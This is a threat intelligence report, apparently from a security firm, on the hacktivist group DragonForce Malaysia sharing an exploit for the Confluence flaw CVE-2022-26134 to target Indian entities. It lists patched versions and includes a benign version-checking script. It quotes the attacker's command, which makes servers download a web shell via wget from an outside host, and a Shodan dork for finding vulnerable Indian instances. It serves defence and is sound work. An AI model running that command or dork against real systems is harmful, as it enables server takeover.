Category: Adversary Intelligence
Threat Type: Latest Attack
Motivation: Hacktivist
Region: India
Source*: D4
Executive Summary
THREAT
- DragonForce Malaysia, a hacktivist group actively targeting Indian entities, announced and shared an exploit for CVE-2022-26134, a Confluence Server vulnerability.
- The group has also shared a list of dorks targeting the Indian region on its Telegram channel.
IMPACT
- Actors can scan the internet for vulnerable Confluence Server instances and leverage this vulnerability to launch attacks against significant Indian entities in both the government and private sectors.
MITIGATION
- Apply the available patches or workarounds for CVE-2022-26134.
- Audit and monitor anomalies in networks that could be indicators of possible compromise.
CloudSEK’s contextual AI digital risk platform XVigil identified a post on a Telegram channel in which the hacktivist group DragonForce Malaysia shared an exploit for CVE-2022-26134, to be used to actively target and exploit Indian entities. CVE-2022-26134 is a critical unauthenticated remote code execution vulnerability in Confluence Server and Data Center.
DragonForce posting updates on their Telegram channel
Analysis and Attribution
Information from Cybercrime Forums
- On 21 June 2022, a threat actor published a post on a cybercrime forum mentioning a PoC (Proof of Concept) for the exploit, along with a Shodan dork for vulnerable Confluence Server instances in the Indian region.
Shodan Dork: http.favicon.hash:-305179312 country:"IN"
- The actor also shared a GitHub repository containing the script, which can be downloaded and run with the following Python command:
CVE-2022-26134.py http://targets.com "wget https://site.com/shell.txt -O DFM.php"
- Later that day, DragonForce Malaysia was seen sharing this exploit with all 152,257 subscribers of its Telegram channel.
- A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
Cybercrime forum post discussing CVE-2022-26134
About DragonForce
- On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
- The group’s stated objective was to retaliate against the Indian Government for controversial comments on Prophet Muhammad made by some Indian politicians.
- The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
- This group owns and operates a forum where they post announcements and discuss their latest activities.
- The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
- The group has been conducting regular recruitment and promotion campaigns using TikTok and Instagram reels.
DragonForce’s Official Communication Channels
Forum: https[:]//dragonforce[.]io
Radio: https[:]//radio[.]dragonforce[.]io
Facebook: https[:]//fb[.]me/dragonforcedotio
Telegram: https[:]//t[.]me/dragonforceio
Twitter: https[:]//twitter[.]com/dragonforceio
Instagram: https[:]//instagram[.]com/dragonforceio
YouTube: https[:]//www.youtube[.]com/channel/UC9GycRXuy7-WMULPBkBp4Bw
Information from OSINT
- Based on information from the open web, CloudSEK researchers identified that, as of 4 June 2022, at least 23 unique IPs were exploiting this vulnerability.
- A Shodan search showed that there are at least 9,396 publicly reachable instances of Confluence on the internet.
Source: Shodan
- The data from Cloudflare indicates that this vulnerability is being exploited by multiple sources on a large scale.
Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare)
Impact & Mitigation
Impact
- DragonForce is associated with multiple hacktivist groups in its campaign against Indian entities. This exploit gives them more opportunities to deface Indian entities' sites and dump their databases.
- Attackers can use this vulnerability to execute commands remotely.
- Threat actors can leverage this opportunity to target victims and deploy ransomware.
- Potential loss of revenue, reputation, and intellectual property.
Mitigation
- Confluence Server and Data Center need to be updated to the following patched versions:
  - 7.4.17
  - 7.13.7
  - 7.14.3
  - 7.15.2
  - 7.16.4
  - 7.17.4
  - 7.18.1
- Audit and monitor anomalies in networks that could be indicators of possible compromise.
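The first question the mitigation list raises for a defender is which deployed Confluence builds still need the upgrade. The helper below is an added example (not CloudSEK's or Atlassian's tooling) that checks an inventory of version strings against the patched versions listed above; it assumes that any release newer than the highest listed fix, 7.18.1, also carries the fix, and the sample inventory is constructed.

```python
"""Check Confluence Server / Data Center versions against the CVE-2022-26134
patched releases listed in this report.  Added example, not vendor tooling.
Assumption: releases newer than 7.18.1 also carry the fix; data is constructed."""
import re
from typing import Dict, Optional, Tuple

# Patched versions named in the report, one per release branch.
PATCHED = ["7.4.17", "7.13.7", "7.14.3", "7.15.2", "7.16.4", "7.17.4", "7.18.1"]


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'major.minor[.patch]' into a comparable tuple; missing patch is 0."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Confluence version: {text!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_patched(version: str) -> bool:
    """Fixed if at or above the patched release of its own branch, or newer
    than every listed fix (assumed to inherit the fix)."""
    v = parse_version(version)
    fixes = [parse_version(p) for p in PATCHED]
    same_branch = [f for f in fixes if f[:2] == v[:2]]
    if same_branch:
        return v >= same_branch[0]
    # A branch with no listed fix (e.g. 7.5.x) is safe only if newer than 7.18.1.
    return v > max(fixes)


def upgrade_target(version: str) -> Optional[str]:
    """Lowest listed patched version an unpatched build can move to; None if fixed."""
    if is_patched(version):
        return None
    v = parse_version(version)
    for fix in sorted(parse_version(p) for p in PATCHED):
        if fix >= v:
            return "%d.%d.%d" % fix
    return None  # not reached: an unpatched build is always below 7.18.1


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map each host to 'patched' or to the version it should be upgraded to."""
    return {host: upgrade_target(ver) or "patched" for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed sample inventory, not data from the report.
    sample = {"wiki-a": "7.13.6", "wiki-b": "7.16.5", "wiki-c": "7.5.3"}
    for host, verdict in triage(sample).items():
        print(f"{host:8s} {sample[host]:8s} -> {verdict}")
```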